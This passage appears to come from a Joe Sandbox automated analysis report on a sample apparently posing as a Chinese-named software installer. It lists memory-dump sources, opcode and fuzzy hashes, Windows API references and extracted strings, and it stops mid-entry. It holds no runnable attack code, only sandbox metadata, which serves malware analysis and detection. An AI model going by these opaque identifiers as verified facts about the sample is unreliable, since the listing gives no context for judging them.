                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b96a3bfa2f071fda60c0812de3eea8bd7f1a293af8749856eb5c89b36b6714e8
                          • Instruction ID: 737299f51e54e574b1c32b864232ff6db7ef3c6a515edd8341f95a3554278fee
                          • Opcode Fuzzy Hash: b96a3bfa2f071fda60c0812de3eea8bd7f1a293af8749856eb5c89b36b6714e8
                          • Instruction Fuzzy Hash: ED819E35A047058FC320CF29C480696B7E1FF99714F288AADC599DB711E772E986CB82
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                          • Instruction ID: 49616c2058307a70f9bb2cb74fb6574d31ff960aea4e52598df82546a644ead6
                          • Opcode Fuzzy Hash: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                          • Instruction Fuzzy Hash: 92518D72F006099BDB08CE98D9916ADB7F2EB88304F648169D111E7781D778DA91CB90
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                          • Instruction ID: 09dfabf9161e3f38f21064aedcfd30bb8bca304f36cd91dbf9bf22661e6054ef
                          • Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                          • Instruction Fuzzy Hash: 033114277A444117C70CCD3BCD2279F91639BD462A70ECF396C05DEF95D92CC8924148
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                          • Instruction ID: 16c34bcc6ab35ae8ef9c1a1d4ad93cf0dee8bab3b558b1c26b38cbfd6ee6b67f
                          • Opcode Fuzzy Hash: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                          • Instruction Fuzzy Hash: D1219077320A0647E74C8A38D83737532D1A705318F98A22DEA6BCE2C2D73AC457C385
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 87ba13bc127ce662d575616e636eb7e9ddde53d19353a83879f57fb393a55a2d
                          • Instruction ID: 4919a465b58e5c6d03bd1199db1323e4e2b9ba3e4f8d9c16503813f3e65a0105
                          • Opcode Fuzzy Hash: 87ba13bc127ce662d575616e636eb7e9ddde53d19353a83879f57fb393a55a2d
                          • Instruction Fuzzy Hash: DEF03072A15234ABDB12CA48C906B9973B8EB45B65F19009BF9419B640D6B4DD80C7D0
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                          • Instruction ID: c20800ebd133e9ef769cf09eac0a82353ee51b865d976f66d46ac39795941aa0
                          • Opcode Fuzzy Hash: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                          • Instruction Fuzzy Hash: 5AE08C73912238EBCB10CBC8CA00D8AB3ECFB44A14B29009AB511D3600D274DE44C7C0
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d8b2ce9af6ca23b39d287f27f794cd19cdb7301d321a8ca7d0b17b1edfa8364a
                          • Instruction ID: cd438e156b011fed833174e53e0a553a46ffb3d47b428b5a4554f9cbea0984e4
                          • Opcode Fuzzy Hash: d8b2ce9af6ca23b39d287f27f794cd19cdb7301d321a8ca7d0b17b1edfa8364a
                          • Instruction Fuzzy Hash: 9AC08CA312810057C302EA26E8C0BABF6A37360330F268C2EA0A2F7E43C328C0B48111
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                          • API String ID: 0-609671
                          • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                          • Instruction ID: acb89ebf4e84bbbeef31d277c4af4d4d434ae0bd63e08d1142c3ca8c7d5130cc
                          • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                          • Instruction Fuzzy Hash: 2BD1C475A04209EFCB21DFA4DA80BEEB7B5FF4530CF248519E455A3A50DB70A989CB70
                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 6CA18927
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6CA1892F
                          • _ValidateLocalCookies.LIBCMT ref: 6CA189B8
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6CA189E3
                          • _ValidateLocalCookies.LIBCMT ref: 6CA18A38
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          • API String ID: 1170836740-1018135373
                          • Opcode ID: 82618d593fe3e20e5966296287a8b48f38b7f3bb7516a4477cabc7033054f7c8
                          • Instruction ID: 1867f6727706a01379ef18442257fca1073d5725591ecad2535658d789859368
                          • Opcode Fuzzy Hash: 82618d593fe3e20e5966296287a8b48f38b7f3bb7516a4477cabc7033054f7c8
                          • Instruction Fuzzy Hash: 1B410934E05218AFCF00CFA8C884ADE7BB5AF4635CF198156E8149BF51D735EA89CB91
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID: api-ms-$ext-ms-
                          • API String ID: 0-537541572
                          • Opcode ID: a41c72e4f26b081baf7c292d05925779f4483e49456d3603cf8451684f432c01
                          • Instruction ID: c391bbb0e90e987ce6dc6f7767c1593e3c0d620b6eb9c4bc88434c6e8dc96ed2
                          • Opcode Fuzzy Hash: a41c72e4f26b081baf7c292d05925779f4483e49456d3603cf8451684f432c01
                          • Instruction Fuzzy Hash: 8E21D831A05331ABDB21DA69DC48A5A3778BF03768F1D4711ED15EB684E638EDC1C5E0
                          APIs
                          • GetConsoleCP.KERNEL32(?,6CA29EF0,?), ref: 6CA2AD19
                          • __fassign.LIBCMT ref: 6CA2AEF8
                          • __fassign.LIBCMT ref: 6CA2AF15
                          • WriteFile.KERNEL32(?,6CA348D6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CA2AF5D
                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CA2AF9D
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CA2B049
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: FileWrite__fassign$ConsoleErrorLast
                          • String ID:
                          • API String ID: 4031098158-0
                          • Opcode ID: 67bb64e0c87fec00748233c4e217a89f4b29553ee3459d1bf5ea9b83cd28a3b7
                          • Instruction ID: 10d32c293802b47961576f51b0960eedefffee00caa8096ed9c69e663c305d73
                          • Opcode Fuzzy Hash: 67bb64e0c87fec00748233c4e217a89f4b29553ee3459d1bf5ea9b83cd28a3b7
                          • Instruction Fuzzy Hash: ABD1BB71E052689FCF15CFA8C8809EDFBB6BF09314F284169E855BB641D735AD8ACB10
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: __aulldiv
                          • String ID: >WJ$x$x
                          • API String ID: 3732870572-3162267903
                          • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                          • Instruction ID: 4744fb32d185dac6d0999c11ab1977ae3aca263c1d4360342eded8a7875eb6c8
                          • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                          • Instruction Fuzzy Hash: 04128A71D00249EFDF10CFA6C990AEDBBB5FF08318F248169E915ABA50DB359989CF50
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6C8E2F95
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6C8E2FAF
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6C8E2FD0
                          • __Getctype.LIBCPMT ref: 6C8E3084
                          • std::_Facet_Register.LIBCPMT ref: 6C8E309C
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6C8E30B7
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                          • String ID:
                          • API String ID: 1102183713-0
                          • Opcode ID: 3c9c869bff4dd12c1d6430aedaa6653423a05ba86e2239a247750aab34074576
                          • Instruction ID: bf4cc32c600417e2c83944a3a37663b604e9bbc11335f8a252835e5c7d6bce69
                          • Opcode Fuzzy Hash: 3c9c869bff4dd12c1d6430aedaa6653423a05ba86e2239a247750aab34074576
                          • Instruction Fuzzy Hash: 514189B1E04218CFCB24CF88CA59B9EB7B0FF5A724F144528D859ABB50D734AD48CB91
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: __aulldiv$__aullrem
                          • String ID:
                          • API String ID: 2022606265-0
                          • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                          • Instruction ID: a5859a6f6c41655d6ba1f3db79b082bf5d20698f0d7f9a9b648124dfc5e75a1f
                          • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                          • Instruction Fuzzy Hash: 5521E370902319BFDF108E959D40DDF7A69EB857A8FA0C225B52062690D2718EE4D7A1
                          APIs
                          • _free.LIBCMT ref: 6CA348FD
                          • _free.LIBCMT ref: 6CA34926
                          • SetEndOfFile.KERNEL32(00000000,6CA3350C,00000000,6CA29EF0,?,?,?,?,?,?,?,6CA3350C,6CA29EF0,00000000), ref: 6CA34958
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CA3350C,6CA29EF0,00000000,?,?,?,?,00000000,?), ref: 6CA34974
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: _free$ErrorFileLast
                          • String ID: 8Q
                          • API String ID: 1547350101-4022487301
                          • Opcode ID: 91eea70bcc3976cb3e49cc994192cf2f3a0a525d85dd2d9a96efeae9b1c7bf24
                          • Instruction ID: 3790a16d1618f2da05cedabeefa0f52eefcc658ad74163f15d0b4f53406193c8
                          • Opcode Fuzzy Hash: 91eea70bcc3976cb3e49cc994192cf2f3a0a525d85dd2d9a96efeae9b1c7bf24
                          • Instruction Fuzzy Hash: 7941D4325056659ADB019BF8CD54BCE7F79AF45328F282210E828E7B90DB36C8CD8765
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CA1DFD4,00000000,?,6CA1E055,6CA18A69,00000003,00000000), ref: 6CA1DF5F
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CA1DF72
                          • FreeLibrary.KERNEL32(00000000,?,?,6CA1DFD4,00000000,?,6CA1E055,6CA18A69,00000003,00000000), ref: 6CA1DF95
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 28665779dcb756f993bb5306db7996649a3ff23119bf75751ef674536ff41575
                          • Instruction ID: e6f12ca0f051d3e55ad8ac198e5bffe348e6c6d04cc969219e550b5ee249c9cd
                          • Opcode Fuzzy Hash: 28665779dcb756f993bb5306db7996649a3ff23119bf75751ef674536ff41575
                          • Instruction Fuzzy Hash: B2F08C30A0522AFFDF06AF50CC0DB9E7A79EB0135AF208164F805E2850CB318F41DAA1
                          APIs
                          • __EH_prolog3.LIBCMT ref: 6CA1614E
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6CA16159
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6CA161C7
                            • Part of subcall function 6CA16050: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6CA16068
                          • std::locale::_Setgloballocale.LIBCPMT ref: 6CA16174
                          • _Yarn.LIBCPMT ref: 6CA1618A
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                          • String ID:
                          • API String ID: 1088826258-0
                          • Opcode ID: ee2a6783ad04249bb6f5fd41c82cb9ce5b663cf8cf95e84ed89283f7fe01c887
                          • Instruction ID: 38d657525bad33aae42ebcbe6f6e174fdf9b99bca7046cf29fd154a02e3d25fc
                          • Opcode Fuzzy Hash: ee2a6783ad04249bb6f5fd41c82cb9ce5b663cf8cf95e84ed89283f7fe01c887
                          • Instruction Fuzzy Hash: 5C018475A045219FDB06DF20C959ABD7771FF96664B140009D805D7F80CF346E8ACB81
                          APIs
                            • Part of subcall function 6CA16147: __EH_prolog3.LIBCMT ref: 6CA1614E
                            • Part of subcall function 6CA16147: std::_Lockit::_Lockit.LIBCPMT ref: 6CA16159
                            • Part of subcall function 6CA16147: std::locale::_Setgloballocale.LIBCPMT ref: 6CA16174
                            • Part of subcall function 6CA16147: _Yarn.LIBCPMT ref: 6CA1618A
                            • Part of subcall function 6CA16147: std::_Lockit::~_Lockit.LIBCPMT ref: 6CA161C7
                            • Part of subcall function 6C8E2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C8E2F95
                            • Part of subcall function 6C8E2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C8E2FAF
                            • Part of subcall function 6C8E2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C8E2FD0
                            • Part of subcall function 6C8E2F60: __Getctype.LIBCPMT ref: 6C8E3084
                            • Part of subcall function 6C8E2F60: std::_Facet_Register.LIBCPMT ref: 6C8E309C
                            • Part of subcall function 6C8E2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C8E30B7
                          • std::ios_base::_Addstd.LIBCPMT ref: 6C8E211B
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                          • API String ID: 3332196525-1866435925
                          • Opcode ID: 478e8252c51201b78e45d76b62a98066a43fb3281b032b019725b90bf5ddb6fa
                          • Instruction ID: 2a8ce2f8e95f65a6d85cad2464cdbf6340b07d16bb3c7a3a1898d406e51208de
                          • Opcode Fuzzy Hash: 478e8252c51201b78e45d76b62a98066a43fb3281b032b019725b90bf5ddb6fa
                          • Instruction Fuzzy Hash: 0641D3B0E0030A8FDB10CF64C9497AEBBB1FF49314F148668E519AB791E775E985CB90
                          APIs
                          • SetFilePointerEx.KERNEL32(00000000,?,00000000,6CA29EF0,6C8E1DEA,00008000,6CA29EF0,?,?,?,6CA29A9F,6CA29EF0,?,00000000,6C8E1DEA), ref: 6CA29BE9
                          • GetLastError.KERNEL32(?,?,?,6CA29A9F,6CA29EF0,?,00000000,6C8E1DEA,?,6CA334BE,6CA29EF0,000000FF,000000FF,00000002,00008000,6CA29EF0), ref: 6CA29BF3
                          • __dosmaperr.LIBCMT ref: 6CA29BFA
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: ErrorFileLastPointer__dosmaperr
                          • String ID: 8Q
                          • API String ID: 2336955059-4022487301
                          • Opcode ID: 539104bcd2e18d39e03ac55c58518a6a8fb11d925aae62a5d94a47fe6a2efcd5
                          • Instruction ID: 9f495f646dc5d3d639c45713b828c8d03bbb84e573c42984a1805fd95024c173
